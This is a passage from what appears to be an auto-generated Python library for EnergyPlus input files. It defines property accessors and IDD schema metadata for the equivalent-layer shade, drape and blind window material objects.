        """field `Front Side Shade Beam-Diffuse Solar Transmittance`

        |  The front side beam-diffuse solar transmittance at normal incidence averaged
        |  over the entire spectrum of solar radiation.
        |  Units: dimensionless
        |  value < 1.0

        Args:
            value (float): value for IDD Field `Front Side Shade Beam-Diffuse Solar Transmittance`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `front_side_shade_beamdiffuse_solar_transmittance` or None if not set

        """
        return self["Front Side Shade Beam-Diffuse Solar Transmittance"]

    @front_side_shade_beamdiffuse_solar_transmittance.setter
    def front_side_shade_beamdiffuse_solar_transmittance(self, value=None):
        """ Corresponds to IDD field `Front Side Shade Beam-Diffuse Solar Transmittance`
        """
        self["Front Side Shade Beam-Diffuse Solar Transmittance"] = value

    @property
    def back_side_shade_beamdiffuse_solar_transmittance(self):
        """field `Back Side Shade Beam-Diffuse Solar Transmittance`

        |  The back side beam-diffuse solar transmittance at normal incidence averaged
        |  over the entire spectrum of solar radiation.
        |  Units: dimensionless
        |  value < 1.0

        Args:
            value (float): value for IDD Field `Back Side Shade Beam-Diffuse Solar Transmittance`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `back_side_shade_beamdiffuse_solar_transmittance` or None if not set

        """
        return self["Back Side Shade Beam-Diffuse Solar Transmittance"]

    @back_side_shade_beamdiffuse_solar_transmittance.setter
    def back_side_shade_beamdiffuse_solar_transmittance(self, value=None):
        """ Corresponds to IDD field `Back Side Shade Beam-Diffuse Solar Transmittance`
        """
        self["Back Side Shade Beam-Diffuse Solar Transmittance"] = value

    @property
    def front_side_shade_beamdiffuse_solar_reflectance(self):
        """field `Front Side Shade Beam-Diffuse Solar Reflectance`

        |  The front side beam-diffuse solar reflectance at normal incidence averaged
        |  over the entire spectrum of solar radiation.
        |  Units: dimensionless
        |  value < 1.0

        Args:
            value (float): value for IDD Field `Front Side Shade Beam-Diffuse Solar Reflectance`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `front_side_shade_beamdiffuse_solar_reflectance` or None if not set

        """
        return self["Front Side Shade Beam-Diffuse Solar Reflectance"]

    @front_side_shade_beamdiffuse_solar_reflectance.setter
    def front_side_shade_beamdiffuse_solar_reflectance(self, value=None):
        """ Corresponds to IDD field `Front Side Shade Beam-Diffuse Solar Reflectance`
        """
        self["Front Side Shade Beam-Diffuse Solar Reflectance"] = value

    @property
    def back_side_shade_beamdiffuse_solar_reflectance(self):
        """field `Back Side Shade Beam-Diffuse Solar Reflectance`

        |  The back side beam-diffuse solar reflectance at normal incidence averaged
        |  over the entire spectrum of solar radiation.
        |  Units: dimensionless
        |  value < 1.0

        Args:
            value (float): value for IDD Field `Back Side Shade Beam-Diffuse Solar Reflectance`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `back_side_shade_beamdiffuse_solar_reflectance` or None if not set

        """
        return self["Back Side Shade Beam-Diffuse Solar Reflectance"]

    @back_side_shade_beamdiffuse_solar_reflectance.setter
    def back_side_shade_beamdiffuse_solar_reflectance(self, value=None):
        """ Corresponds to IDD field `Back Side Shade Beam-Diffuse Solar Reflectance`
        """
        self["Back Side Shade Beam-Diffuse Solar Reflectance"] = value

    @property
    def shade_beambeam_visible_transmittance_at_normal_incidence(self):
        """field `Shade Beam-Beam Visible Transmittance at Normal Incidence`

        |  The beam-beam visible transmittance at normal incidence averaged over the
        |  visible spectrum range of solar radiation. Assumed to be the same for
        |  front and back sides of the shade.
        |  Units: dimensionless
        |  value < 1.0

        Args:
            value (float): value for IDD Field `Shade Beam-Beam Visible Transmittance at Normal Incidence`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `shade_beambeam_visible_transmittance_at_normal_incidence` or None if not set

        """
        return self[
            "Shade Beam-Beam Visible Transmittance at Normal Incidence"]

    @shade_beambeam_visible_transmittance_at_normal_incidence.setter
    def shade_beambeam_visible_transmittance_at_normal_incidence(
            self,
            value=None):
        """ Corresponds to IDD field `Shade Beam-Beam Visible Transmittance at Normal Incidence`
        """
        self[
            "Shade Beam-Beam Visible Transmittance at Normal Incidence"] = value

    @property
    def shade_beamdiffuse_visible_transmittance_at_normal_incidence(self):
        """field `Shade Beam-Diffuse Visible Transmittance at Normal Incidence`

        |  The beam-diffuse visible transmittance at normal incidence averaged over the
        |  visible spectrum range of solar radiation. Assumed to be the same for
        |  front and back sides of the shade.
        |  Units: dimensionless
        |  value < 1.0

        Args:
            value (float): value for IDD Field `Shade Beam-Diffuse Visible Transmittance at Normal Incidence`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `shade_beamdiffuse_visible_transmittance_at_normal_incidence` or None if not set

        """
        return self[
            "Shade Beam-Diffuse Visible Transmittance at Normal Incidence"]

    @shade_beamdiffuse_visible_transmittance_at_normal_incidence.setter
    def shade_beamdiffuse_visible_transmittance_at_normal_incidence(
            self,
            value=None):
        """ Corresponds to IDD field `Shade Beam-Diffuse Visible Transmittance at Normal Incidence`
        """
        self[
            "Shade Beam-Diffuse Visible Transmittance at Normal Incidence"] = value

    @property
    def shade_beamdiffuse_visible_reflectance_at_normal_incidence(self):
        """field `Shade Beam-Diffuse Visible Reflectance at Normal Incidence`

        |  The beam-diffuse visible reflectance at normal incidence averaged over the
        |  visible spectrum range of solar radiation. Assumed to be the same for
        |  front and back sides of the shade.
        |  Units: dimensionless
        |  value < 1.0

        Args:
            value (float): value for IDD Field `Shade Beam-Diffuse Visible Reflectance at Normal Incidence`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `shade_beamdiffuse_visible_reflectance_at_normal_incidence` or None if not set

        """
        return self[
            "Shade Beam-Diffuse Visible Reflectance at Normal Incidence"]

    @shade_beamdiffuse_visible_reflectance_at_normal_incidence.setter
    def shade_beamdiffuse_visible_reflectance_at_normal_incidence(
            self,
            value=None):
        """ Corresponds to IDD field `Shade Beam-Diffuse Visible Reflectance at Normal Incidence`
        """
        self[
            "Shade Beam-Diffuse Visible Reflectance at Normal Incidence"] = value

    @property
    def shade_material_infrared_transmittance(self):
        """field `Shade Material Infrared Transmittance`

        |  The long-wave transmittance of the shade material at zero shade openness.
        |  Assumed to be the same for front and back sides of the shade.
        |  Units: dimensionless
        |  Default value: 0.05
        |  value < 1.0

        Args:
            value (float): value for IDD Field `Shade Material Infrared Transmittance`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `shade_material_infrared_transmittance` or None if not set

        """
        return self["Shade Material Infrared Transmittance"]

    @shade_material_infrared_transmittance.setter
    def shade_material_infrared_transmittance(self, value=0.05):
        """Corresponds to IDD field `Shade Material Infrared Transmittance`"""
        self["Shade Material Infrared Transmittance"] = value

    @property
    def front_side_shade_material_infrared_emissivity(self):
        """field `Front Side Shade Material Infrared Emissivity`

        |  The front side long-wave emissivity of the shade material at zero shade
        |  openness. Openness fraction is used to calculate the effective emissivity
        |  value.
        |  Units: dimensionless
        |  Default value: 0.91
        |  value < 1.0

        Args:
            value (float): value for IDD Field `Front Side Shade Material Infrared Emissivity`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `front_side_shade_material_infrared_emissivity` or None if not set

        """
        return self["Front Side Shade Material Infrared Emissivity"]

    @front_side_shade_material_infrared_emissivity.setter
    def front_side_shade_material_infrared_emissivity(self, value=0.91):
        """Corresponds to IDD field `Front Side Shade Material Infrared
        Emissivity`"""
        self["Front Side Shade Material Infrared Emissivity"] = value

    @property
    def back_side_shade_material_infrared_emissivity(self):
        """field `Back Side Shade Material Infrared Emissivity`

        |  The back side long-wave emissivity of the shade material at zero shade
        |  openness. Openness fraction is used to calculate the effective emissivity
        |  value.
        |  Units: dimensionless
        |  Default value: 0.91
        |  value < 1.0

        Args:
            value (float): value for IDD Field `Back Side Shade Material Infrared Emissivity`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `back_side_shade_material_infrared_emissivity` or None if not set

        """
        return self["Back Side Shade Material Infrared Emissivity"]

    @back_side_shade_material_infrared_emissivity.setter
    def back_side_shade_material_infrared_emissivity(self, value=0.91):
        """Corresponds to IDD field `Back Side Shade Material Infrared
        Emissivity`"""
        self["Back Side Shade Material Infrared Emissivity"] = value
class WindowMaterialDrapeEquivalentLayer(DataObject):

    """ Corresponds to IDD object `WindowMaterial:Drape:EquivalentLayer`
        Specifies the properties of equivalent layer drape fabric materials.
        Shades are considered to be perfect diffusers (all transmitted and reflected
        radiation is hemispherically-diffuse) independent of angle of incidence.
        Unpleated drape fabric is treated as thin and flat layer.
    """
    # IDD schema metadata consumed by the DataObject base class.  Field order
    # mirrors the IDD object definition (order matters for IDF round-tripping,
    # hence OrderedDict).  The keys 'maximum<' / 'minimum>' appear to denote
    # strict (exclusive) bounds -- this matches the "value < 1.0" notes in the
    # property docstrings below; TODO(review): confirm against DataObject's
    # validation logic.
    _schema = {'extensible-fields': OrderedDict(),
               'fields': OrderedDict([(u'name',
                                       {'name': u'Name',
                                        'pyname': u'name',
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'alpha'}),
                                      (u'drape beam-beam solar transmittance at normal incidence',
                                       {'name': u'Drape Beam-Beam Solar Transmittance at Normal Incidence',
                                        'pyname': u'drape_beambeam_solar_transmittance_at_normal_incidence',
                                        'default': 0.0,
                                        'maximum': 0.2,
                                        'required-field': False,
                                        'autosizable': False,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'dimensionless'}),
                                      (u'front side drape beam-diffuse solar transmittance',
                                       {'name': u'Front Side Drape Beam-Diffuse Solar Transmittance',
                                        'pyname': u'front_side_drape_beamdiffuse_solar_transmittance',
                                        'maximum<': 1.0,
                                        'required-field': True,
                                        'autosizable': False,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'dimensionless'}),
                                      (u'back side drape beam-diffuse solar transmittance',
                                       {'name': u'Back Side Drape Beam-Diffuse Solar Transmittance',
                                        'pyname': u'back_side_drape_beamdiffuse_solar_transmittance',
                                        'maximum<': 1.0,
                                        'required-field': True,
                                        'autosizable': False,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'dimensionless'}),
                                      (u'front side drape beam-diffuse solar reflectance',
                                       {'name': u'Front Side Drape Beam-Diffuse Solar Reflectance',
                                        'pyname': u'front_side_drape_beamdiffuse_solar_reflectance',
                                        'maximum<': 1.0,
                                        'required-field': True,
                                        'autosizable': False,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'dimensionless'}),
                                      (u'back side drape beam-diffuse solar reflectance',
                                       {'name': u'Back Side Drape Beam-Diffuse Solar Reflectance',
                                        'pyname': u'back_side_drape_beamdiffuse_solar_reflectance',
                                        'maximum<': 1.0,
                                        'required-field': True,
                                        'autosizable': False,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'dimensionless'}),
                                      (u'drape beam-beam visible transmittance',
                                       {'name': u'Drape Beam-Beam Visible Transmittance',
                                        'pyname': u'drape_beambeam_visible_transmittance',
                                        'maximum<': 1.0,
                                        'required-field': False,
                                        'autosizable': False,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'dimensionless'}),
                                      (u'drape beam-diffuse visible transmittance',
                                       {'name': u'Drape Beam-Diffuse Visible Transmittance',
                                        'pyname': u'drape_beamdiffuse_visible_transmittance',
                                        'maximum<': 1.0,
                                        'required-field': False,
                                        'autosizable': False,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'dimensionless'}),
                                      (u'drape beam-diffuse visible reflectance',
                                       {'name': u'Drape Beam-Diffuse Visible Reflectance',
                                        'pyname': u'drape_beamdiffuse_visible_reflectance',
                                        'maximum<': 1.0,
                                        'required-field': False,
                                        'autosizable': False,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'dimensionless'}),
                                      (u'drape material infrared transmittance',
                                       {'name': u'Drape Material Infrared Transmittance',
                                        'pyname': u'drape_material_infrared_transmittance',
                                        'default': 0.05,
                                        'maximum<': 1.0,
                                        'required-field': False,
                                        'autosizable': False,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'dimensionless'}),
                                      (u'front side drape material infrared emissivity',
                                       {'name': u'Front Side Drape Material Infrared Emissivity',
                                        'pyname': u'front_side_drape_material_infrared_emissivity',
                                        'default': 0.87,
                                        'minimum>': 0.0,
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'maximum<': 1.0,
                                        'unit': u'dimensionless'}),
                                      (u'back side drape material infrared emissivity',
                                       {'name': u'Back Side Drape Material Infrared Emissivity',
                                        'pyname': u'back_side_drape_material_infrared_emissivity',
                                        'default': 0.87,
                                        'minimum>': 0.0,
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'maximum<': 1.0,
                                        'unit': u'dimensionless'}),
                                      (u'width of pleated fabric',
                                       {'name': u'Width of Pleated Fabric',
                                        'pyname': u'width_of_pleated_fabric',
                                        'default': 0.0,
                                        'required-field': False,
                                        'autosizable': False,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'm'}),
                                      (u'length of pleated fabric',
                                       {'name': u'Length of Pleated Fabric',
                                        'pyname': u'length_of_pleated_fabric',
                                        'default': 0.0,
                                        'required-field': False,
                                        'autosizable': False,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'm'})]),
               'format': None,
               'group': u'Surface Construction Elements',
               'min-fields': 4,
               'name': u'WindowMaterial:Drape:EquivalentLayer',
               'pyname': u'WindowMaterialDrapeEquivalentLayer',
               'required-object': False,
               'unique-object': False}

    # Each field below is exposed as a property pair; both getter and setter
    # delegate to DataObject item access keyed by the field's display name.

    @property
    def name(self):
        """field `Name`

        Args:
            value (str): value for IDD Field `Name`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `name` or None if not set

        """
        return self["Name"]

    @name.setter
    def name(self, value=None):
        """Corresponds to IDD field `Name`"""
        self["Name"] = value

    @property
    def drape_beambeam_solar_transmittance_at_normal_incidence(self):
        """field `Drape Beam-Beam Solar Transmittance at Normal Incidence`

        |  The beam-beam solar transmittance at normal incidence. This value is the
        |  same as the openness area fraction of the drape fabric. Assumed to be
        |  same for front and back sides.
        |  Units: dimensionless
        |  value <= 0.2

        Args:
            value (float): value for IDD Field `Drape Beam-Beam Solar Transmittance at Normal Incidence`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `drape_beambeam_solar_transmittance_at_normal_incidence` or None if not set

        """
        return self["Drape Beam-Beam Solar Transmittance at Normal Incidence"]

    @drape_beambeam_solar_transmittance_at_normal_incidence.setter
    def drape_beambeam_solar_transmittance_at_normal_incidence(
            self,
            value=None):
        """ Corresponds to IDD field `Drape Beam-Beam Solar Transmittance at Normal Incidence`
        """
        self["Drape Beam-Beam Solar Transmittance at Normal Incidence"] = value

    @property
    def front_side_drape_beamdiffuse_solar_transmittance(self):
        """field `Front Side Drape Beam-Diffuse Solar Transmittance`

        |  The front side beam-diffuse solar transmittance at normal incidence averaged
        |  over the entire spectrum of solar radiation. Assumed to be the same for front
        |  and back sides.
        |  Units: dimensionless
        |  value < 1.0

        Args:
            value (float): value for IDD Field `Front Side Drape Beam-Diffuse Solar Transmittance`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `front_side_drape_beamdiffuse_solar_transmittance` or None if not set

        """
        return self["Front Side Drape Beam-Diffuse Solar Transmittance"]

    @front_side_drape_beamdiffuse_solar_transmittance.setter
    def front_side_drape_beamdiffuse_solar_transmittance(self, value=None):
        """ Corresponds to IDD field `Front Side Drape Beam-Diffuse Solar Transmittance`
        """
        self["Front Side Drape Beam-Diffuse Solar Transmittance"] = value

    @property
    def back_side_drape_beamdiffuse_solar_transmittance(self):
        """field `Back Side Drape Beam-Diffuse Solar Transmittance`

        |  The back side beam-diffuse solar transmittance at normal incidence averaged
        |  over the entire spectrum of solar radiation. Assumed to be the same for front
        |  and back sides.
        |  Units: dimensionless
        |  value < 1.0

        Args:
            value (float): value for IDD Field `Back Side Drape Beam-Diffuse Solar Transmittance`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `back_side_drape_beamdiffuse_solar_transmittance` or None if not set

        """
        return self["Back Side Drape Beam-Diffuse Solar Transmittance"]

    @back_side_drape_beamdiffuse_solar_transmittance.setter
    def back_side_drape_beamdiffuse_solar_transmittance(self, value=None):
        """ Corresponds to IDD field `Back Side Drape Beam-Diffuse Solar Transmittance`
        """
        self["Back Side Drape Beam-Diffuse Solar Transmittance"] = value

    @property
    def front_side_drape_beamdiffuse_solar_reflectance(self):
        """field `Front Side Drape Beam-Diffuse Solar Reflectance`

        |  The front side beam-diffuse solar reflectance at normal incidence averaged
        |  over the entire spectrum of solar radiation.
        |  Units: dimensionless
        |  value < 1.0

        Args:
            value (float): value for IDD Field `Front Side Drape Beam-Diffuse Solar Reflectance`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `front_side_drape_beamdiffuse_solar_reflectance` or None if not set

        """
        return self["Front Side Drape Beam-Diffuse Solar Reflectance"]

    @front_side_drape_beamdiffuse_solar_reflectance.setter
    def front_side_drape_beamdiffuse_solar_reflectance(self, value=None):
        """ Corresponds to IDD field `Front Side Drape Beam-Diffuse Solar Reflectance`
        """
        self["Front Side Drape Beam-Diffuse Solar Reflectance"] = value

    @property
    def back_side_drape_beamdiffuse_solar_reflectance(self):
        """field `Back Side Drape Beam-Diffuse Solar Reflectance`

        |  The back side beam-diffuse solar reflectance at normal incidence averaged
        |  over the entire spectrum of solar radiation.
        |  Units: dimensionless
        |  value < 1.0

        Args:
            value (float): value for IDD Field `Back Side Drape Beam-Diffuse Solar Reflectance`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `back_side_drape_beamdiffuse_solar_reflectance` or None if not set

        """
        return self["Back Side Drape Beam-Diffuse Solar Reflectance"]

    @back_side_drape_beamdiffuse_solar_reflectance.setter
    def back_side_drape_beamdiffuse_solar_reflectance(self, value=None):
        """ Corresponds to IDD field `Back Side Drape Beam-Diffuse Solar Reflectance`
        """
        self["Back Side Drape Beam-Diffuse Solar Reflectance"] = value

    @property
    def drape_beambeam_visible_transmittance(self):
        """field `Drape Beam-Beam Visible Transmittance`

        |  The beam-beam visible transmittance at normal incidence averaged over the
        |  visible spectrum of solar radiation. Assumed same for front and back sides.
        |  Units: dimensionless
        |  value < 1.0

        Args:
            value (float): value for IDD Field `Drape Beam-Beam Visible Transmittance`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `drape_beambeam_visible_transmittance` or None if not set

        """
        return self["Drape Beam-Beam Visible Transmittance"]

    @drape_beambeam_visible_transmittance.setter
    def drape_beambeam_visible_transmittance(self, value=None):
        """ Corresponds to IDD field `Drape Beam-Beam Visible Transmittance`
        """
        self["Drape Beam-Beam Visible Transmittance"] = value

    @property
    def drape_beamdiffuse_visible_transmittance(self):
        """field `Drape Beam-Diffuse Visible Transmittance`

        |  The beam-diffuse visible transmittance at normal incidence averaged over the
        |  visible spectrum range of solar radiation. Assumed to be the same for front
        |  and back sides.
        |  Units: dimensionless
        |  value < 1.0

        Args:
            value (float): value for IDD Field `Drape Beam-Diffuse Visible Transmittance`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `drape_beamdiffuse_visible_transmittance` or None if not set

        """
        return self["Drape Beam-Diffuse Visible Transmittance"]

    @drape_beamdiffuse_visible_transmittance.setter
    def drape_beamdiffuse_visible_transmittance(self, value=None):
        """ Corresponds to IDD field `Drape Beam-Diffuse Visible Transmittance`
        """
        self["Drape Beam-Diffuse Visible Transmittance"] = value

    @property
    def drape_beamdiffuse_visible_reflectance(self):
        """field `Drape Beam-Diffuse Visible Reflectance`

        |  The beam-diffuse visible reflectance at normal incidence average over the
        |  visible spectrum range of solar radiation. Assumed to be the same for front
        |  and back sides.
        |  Units: dimensionless
        |  value < 1.0

        Args:
            value (float): value for IDD Field `Drape Beam-Diffuse Visible Reflectance`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `drape_beamdiffuse_visible_reflectance` or None if not set

        """
        return self["Drape Beam-Diffuse Visible Reflectance"]

    @drape_beamdiffuse_visible_reflectance.setter
    def drape_beamdiffuse_visible_reflectance(self, value=None):
        """ Corresponds to IDD field `Drape Beam-Diffuse Visible Reflectance`
        """
        self["Drape Beam-Diffuse Visible Reflectance"] = value

    @property
    def drape_material_infrared_transmittance(self):
        """field `Drape Material Infrared Transmittance`

        |  Long-wave transmittance of the drape fabric at zero openness fraction.
        |  Assumed same for front and back sides.
        |  Units: dimensionless
        |  Default value: 0.05
        |  value < 1.0

        Args:
            value (float): value for IDD Field `Drape Material Infrared Transmittance`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `drape_material_infrared_transmittance` or None if not set

        """
        return self["Drape Material Infrared Transmittance"]

    @drape_material_infrared_transmittance.setter
    def drape_material_infrared_transmittance(self, value=0.05):
        """Corresponds to IDD field `Drape Material Infrared Transmittance`"""
        self["Drape Material Infrared Transmittance"] = value

    @property
    def front_side_drape_material_infrared_emissivity(self):
        """field `Front Side Drape Material Infrared Emissivity`

        |  Front side long-wave emissivity of the drape fabric at zero shade openness.
        |  Openness fraction specified above is used to calculate the effective
        |  emissivity value.
        |  Units: dimensionless
        |  Default value: 0.87
        |  value < 1.0

        Args:
            value (float): value for IDD Field `Front Side Drape Material Infrared Emissivity`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `front_side_drape_material_infrared_emissivity` or None if not set

        """
        return self["Front Side Drape Material Infrared Emissivity"]

    @front_side_drape_material_infrared_emissivity.setter
    def front_side_drape_material_infrared_emissivity(self, value=0.87):
        """Corresponds to IDD field `Front Side Drape Material Infrared
        Emissivity`"""
        self["Front Side Drape Material Infrared Emissivity"] = value

    @property
    def back_side_drape_material_infrared_emissivity(self):
        """field `Back Side Drape Material Infrared Emissivity`

        |  Back side long-wave emissivity of the drape fabric at zero shade openness.
        |  Openness fraction specified above is used to calculate the effective
        |  emissivity value.
        |  Units: dimensionless
        |  Default value: 0.87
        |  value < 1.0

        Args:
            value (float): value for IDD Field `Back Side Drape Material Infrared Emissivity`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `back_side_drape_material_infrared_emissivity` or None if not set

        """
        return self["Back Side Drape Material Infrared Emissivity"]

    @back_side_drape_material_infrared_emissivity.setter
    def back_side_drape_material_infrared_emissivity(self, value=0.87):
        """Corresponds to IDD field `Back Side Drape Material Infrared
        Emissivity`"""
        self["Back Side Drape Material Infrared Emissivity"] = value

    @property
    def width_of_pleated_fabric(self):
        """field `Width of Pleated Fabric`

        |  Width of the pleated section of the draped fabric. If the drape fabric is
        |  unpleated or is flat, then the pleated section width is set to zero.
        |  Units: m
        |  IP-Units: in

        Args:
            value (float): value for IDD Field `Width of Pleated Fabric`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `width_of_pleated_fabric` or None if not set

        """
        return self["Width of Pleated Fabric"]

    @width_of_pleated_fabric.setter
    def width_of_pleated_fabric(self, value=None):
        """Corresponds to IDD field `Width of Pleated Fabric`"""
        self["Width of Pleated Fabric"] = value

    @property
    def length_of_pleated_fabric(self):
        """field `Length of Pleated Fabric`

        |  Length of the pleated section of the draped fabric. If the drape fabric is
        |  unpleated or is flat, then the pleated section length is set to zero.
        |  Units: m
        |  IP-Units: in

        Args:
            value (float): value for IDD Field `Length of Pleated Fabric`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `length_of_pleated_fabric` or None if not set

        """
        return self["Length of Pleated Fabric"]

    @length_of_pleated_fabric.setter
    def length_of_pleated_fabric(self, value=None):
        """Corresponds to IDD field `Length of Pleated Fabric`"""
        self["Length of Pleated Fabric"] = value
class WindowMaterialBlindEquivalentLayer(DataObject):

    """ Corresponds to IDD object `WindowMaterial:Blind:EquivalentLayer`
        Window equivalent layer blind slat optical and thermal properties.
        The model assumes that slats are thin and flat, and applies an
        empirical correction correlation to account for curvature effect.
        Slats are assumed to transmit and reflect diffusely.
    """
    # IDD schema driving DataObject's generic field validation/storage:
    # keys are normalized field names; each entry carries the field's
    # pyname, type, required/default status, and min/max bounds.
    _schema = {'extensible-fields': OrderedDict(),
               'fields': OrderedDict([(u'name',
                                       {'name': u'Name',
                                        'pyname': u'name',
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'alpha'}),
                                      (u'slat orientation',
                                       {'name': u'Slat Orientation',
                                        'pyname': u'slat_orientation',
                                        'default': u'Horizontal',
                                        'required-field': False,
                                        'autosizable': False,
                                        'accepted-values': [u'Horizontal',
                                                            u'Vertical'],
                                        'autocalculatable': False,
                                        'type': 'alpha'}),
                                      (u'slat width',
                                       {'name': u'Slat Width',
                                        'pyname': u'slat_width',
                                        'minimum>': 0.0,
                                        'maximum': 0.025,
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'm'}),
                                      (u'slat separation',
                                       {'name': u'Slat Separation',
                                        'pyname': u'slat_separation',
                                        'minimum>': 0.0,
                                        'maximum': 0.025,
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'm'}),
                                      (u'slat crown',
                                       {'name': u'Slat Crown',
                                        'pyname': u'slat_crown',
                                        'default': 0.0015,
                                        'maximum': 0.00156,
                                        'required-field': False,
                                        'autosizable': False,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'm'}),
                                      (u'slat angle',
                                       {'name': u'Slat Angle',
                                        'pyname': u'slat_angle',
                                        'default': 45.0,
                                        'maximum': 180.0,
                                        'required-field': False,
                                        'autosizable': False,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'deg'}),
                                      (u'front side slat beam-diffuse solar transmittance',
                                       {'name': u'Front Side Slat Beam-Diffuse Solar Transmittance',
                                        'pyname': u'front_side_slat_beamdiffuse_solar_transmittance',
                                        'default': 0.0,
                                        'maximum<': 1.0,
                                        'required-field': False,
                                        'autosizable': False,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real'}),
                                      (u'back side slat beam-diffuse solar transmittance',
                                       {'name': u'Back Side Slat Beam-Diffuse Solar Transmittance',
                                        'pyname': u'back_side_slat_beamdiffuse_solar_transmittance',
                                        'default': 0.0,
                                        'maximum<': 1.0,
                                        'required-field': False,
                                        'autosizable': False,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'dimensionless'}),
                                      (u'front side slat beam-diffuse solar reflectance',
                                       {'name': u'Front Side Slat Beam-Diffuse Solar Reflectance',
                                        'pyname': u'front_side_slat_beamdiffuse_solar_reflectance',
                                        'maximum<': 1.0,
                                        'required-field': True,
                                        'autosizable': False,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'dimensionless'}),
                                      (u'back side slat beam-diffuse solar reflectance',
                                       {'name': u'Back Side Slat Beam-Diffuse Solar Reflectance',
                                        'pyname': u'back_side_slat_beamdiffuse_solar_reflectance',
                                        'maximum<': 1.0,
                                        'required-field': True,
                                        'autosizable': False,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'dimensionless'}),
                                      (u'front side slat beam-diffuse visible transmittance',
                                       {'name': u'Front Side Slat Beam-Diffuse Visible Transmittance',
                                        'pyname': u'front_side_slat_beamdiffuse_visible_transmittance',
                                        'default': 0.0,
                                        'maximum<': 1.0,
                                        'required-field': False,
                                        'autosizable': False,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'dimensionless'}),
                                      (u'back side slat beam-diffuse visible transmittance',
                                       {'name': u'Back Side Slat Beam-Diffuse Visible Transmittance',
                                        'pyname': u'back_side_slat_beamdiffuse_visible_transmittance',
                                        'default': 0.0,
                                        'maximum<': 1.0,
                                        'required-field': False,
                                        'autosizable': False,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'dimensionless'}),
                                      (u'front side slat beam-diffuse visible reflectance',
                                       {'name': u'Front Side Slat Beam-Diffuse Visible Reflectance',
                                        'pyname': u'front_side_slat_beamdiffuse_visible_reflectance',
                                        'maximum<': 1.0,
                                        'required-field': False,
                                        'autosizable': False,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'dimensionless'}),
                                      (u'back side slat beam-diffuse visible reflectance',
                                       {'name': u'Back Side Slat Beam-Diffuse Visible Reflectance',
                                        'pyname': u'back_side_slat_beamdiffuse_visible_reflectance',
                                        'maximum<': 1.0,
                                        'required-field': False,
                                        'autosizable': False,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'dimensionless'}),
                                      (u'slat diffuse-diffuse solar transmittance',
                                       {'name': u'Slat Diffuse-Diffuse Solar Transmittance',
                                        'pyname': u'slat_diffusediffuse_solar_transmittance',
                                        'default': 0.0,
                                        'maximum<': 1.0,
                                        'required-field': False,
                                        'autosizable': False,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'dimensionless'}),
